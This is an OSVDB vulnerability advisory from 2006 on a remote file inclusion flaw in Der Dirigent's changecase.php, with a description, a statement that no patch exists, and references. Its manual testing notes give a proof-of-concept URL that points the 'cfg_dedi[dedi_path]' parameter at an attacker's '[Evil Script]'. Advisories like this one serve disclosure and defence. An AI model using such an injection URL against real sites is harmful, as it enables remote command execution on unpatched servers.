Der Dirigent changecase.php cfg_dedi[dedi_path] Variable Remote File Inclusion

2006-10-24T08:03:55
ID OSVDB:29954
Type osvdb
Reporter Drago84()
Modified 2006-10-24T08:03:55

Description

Vulnerability Description

Der Dirigent contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to changecase.php not properly sanitizing user input supplied to the 'cfg_dedi[dedi_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Der Dirigent contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to changecase.php not properly sanitizing user input supplied to the 'cfg_dedi[dedi_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/der_PATH/backend/external/wysiwyg/popups/changecase.php?cfg_dedi['dedi_path']=[Evil Script]

References:

Vendor URL: http://der-dirigent.de/ Secunia Advisory ID:22546 Related OSVDB ID: 29953 Related OSVDB ID: 29955 Related OSVDB ID: 29951 Related OSVDB ID: 29956 Related OSVDB ID: 29958 Related OSVDB ID: 29950 Related OSVDB ID: 29952 Related OSVDB ID: 29957 Related OSVDB ID: 29959 Packet Storm: http://packetstormsecurity.org/0610-exploits/Derdirigent.txt ISS X-Force ID: 29760 FrSIRT Advisory: ADV-2006-4164 CVE-2006-5507 Bugtraq ID: 20702